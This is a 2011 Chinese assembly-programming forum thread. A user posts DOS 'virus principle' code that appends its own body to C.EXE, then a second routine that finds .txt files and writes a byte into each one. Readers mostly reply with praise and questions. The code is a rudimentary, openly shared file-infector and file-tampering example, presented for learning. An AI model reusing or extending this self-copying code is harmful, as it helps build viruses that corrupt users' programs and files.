自己用汇编写的一段病毒原理代码

柏柏 · 发表于 2011-10-2 21:43:03

马上注册，结交更多好友，享用更多功能^_^

您需要登录才可以下载或查看，没有账号？立即注册

x

本帖最后由柏柏于 2011-11-5 16:04 编辑

这段代码就是复制自身代码的某段到别的程序尾部！！ 我修改了此病毒!!

更新中！往下看！下面有附件！！

assume cs:code,ds:code
code segment
VirusStart:
pop si
start: jmp xc
;---------------------------------------------
f_namea db 'C.EXE',0 ;f_namea 存放文件名称
f_worda dw ?,0 ;f-worda 存放'文件内容!'
f_hao dw ?,0 ;f_hao 存放句柄
VirusLength equ VirusEnd-VirusStart 
;-----------------------------------------------
xc:
mov ah,3dh ;打开文件
mov dx,code
mov ds,dx
lea dx,f_namea 
mov al,2 
int 21h 
mov f_hao,ax ;这是AX文件句柄->给f_hao存放
xwz:
mov ah,42h ;移动文件指针
mov al,2 ;到文件尾部
mov bx,f_hao
xor cx,cx
xor dx,dx
int 21h
xw:
mov ah,40h ;写入内容
mov bx,f_hao ;把文件句柄给bx
mov dx,si 
mov cx,VirusLength 
int 21h
xend: 
mov ax,4c00h
int 21h
VirusEnd EQU $
code ends
end start

登录/注册后可看大图

深蓝 · 发表于 2011-10-2 22:27:43

强呀。。还是有些东西没看懂。。

顶你~~~

cyousui · 发表于 2011-10-2 22:46:02

剩下的就是重定位，改写目标程序入口地址

Mr.han · 发表于 2011-10-3 02:10:29

好好学习，天天向上，支持鱼C，哦也！！

柏柏 · 发表于 2011-10-3 08:32:36

本帖最后由柏柏于 2014-2-21 11:29 编辑

此病毒就是把自己程序代码复制到目录下 C.EXE文件的尾部。
没有什么危害但是请慎用！！

--2011年10月3 日

柏柏 · 发表于 2011-10-3 08:42:42

也可以试验一下，把别的程序复制到目录下，再改为c.exe在运行下！！

柏柏 · 发表于 2011-10-3 08:47:13

先把别的程序复到病毒程序目录下再改名为C.exe
然后在点击 c.exe 看看有什么效果！

柏柏 · 发表于 2011-10-3 10:07:05

本帖最后由柏柏于 2011-10-3 12:01 编辑

喜欢就
喜欢

苍白の月 · 发表于 2011-10-3 10:53:52

杀毒软件杀得动吗？？

柏柏 · 发表于 2011-10-3 10:59:30

苍白の月发表于 2011-10-3 10:53

登录/注册后可看大图

杀毒软件杀得动吗？？

恩,没有什么加密解密的,隐藏什么

JMP · 发表于 2011-10-3 12:53:03

{:1_1:}支持下，顶顶顶！！！

s0512 · 发表于 2011-10-4 14:33:02

嗯。。。大大的GOOD

关键是感觉 · 发表于 2011-10-4 19:43:14

支持一下把
！

cqy55555 · 发表于 2011-10-4 23:13:07

很好,很强大,顶顶更强大!

crazylinux · 发表于 2011-10-5 08:19:24

经典喜欢加油

柏柏 · 发表于 2011-10-5 14:05:32

本帖最后由柏柏于 2011-10-5 14:16 编辑

搜索代码：功能查找目录所有的[*。txt]文本文件并在开头写入‘a’ 代码如下。不重复写入文件!!

.model tiny
.code
ORG 100h
start:
;========================
a db ?,0
bword db 'a',0
fhao dw ?,0
fname db '**.txt',0
;;========================
mov ah,4Eh ;查找第一个文件
mov dx,offset fname
int 21h
sloop:
jc fend
mov ax,3D02H  ;r/w 方式打开文件
mov dx,9Eh        ;文件名存放在dta
int 21h
mov fhao,ax       ;文件句柄存放在fhao

mov bx,fhao
mov cx,1
mov dx,offset a
mov ax,3f00h ;读文件开头前1个字节 因为cx=1
int 21h

cmp WORD ptr [a],'a' ;比较当前打开文件开头如果写过久跳转 
je ft   ;跳转


mov bx,fhao
mov dx,offset bword
mov cx,1
mov ah,40h   ;写文件 文件内容为‘a’ 
int 21h

; mov ah,3eh  ;关闭文件 
; mov bx,fhao
; int 21h

ft:
mov ah,4Fh ;查找下一个文件
int 21h
jmp sloop
fend: mov ax,4c00h
int 21h

end start

wei522688662 · 发表于 2011-10-5 19:05:12

厉害!

嗜血灵异狂 · 发表于 2011-10-5 20:04:23

问下这段代码有什么功能可以让计算机死机蓝屏还是关机重启不了还是监控盗号呢？

Mr.han · 发表于 2011-10-5 21:07:03

我是看不懂了总之LZ比我强

柏柏 · 发表于 2011-10-6 08:44:24

嗜血灵异狂发表于 2011-10-5 20:04

登录/注册后可看大图

问下这段代码有什么功能可以让计算机死机蓝屏还是关机重启不了还是监控盗号呢？

代码没有你说的这样!
代码前面有说明

账号		自动登录	找回密码
密码			立即注册

[技术交流] 自己用汇编写的一段病毒原理代码

马上注册，结交更多好友，享用更多功能^_^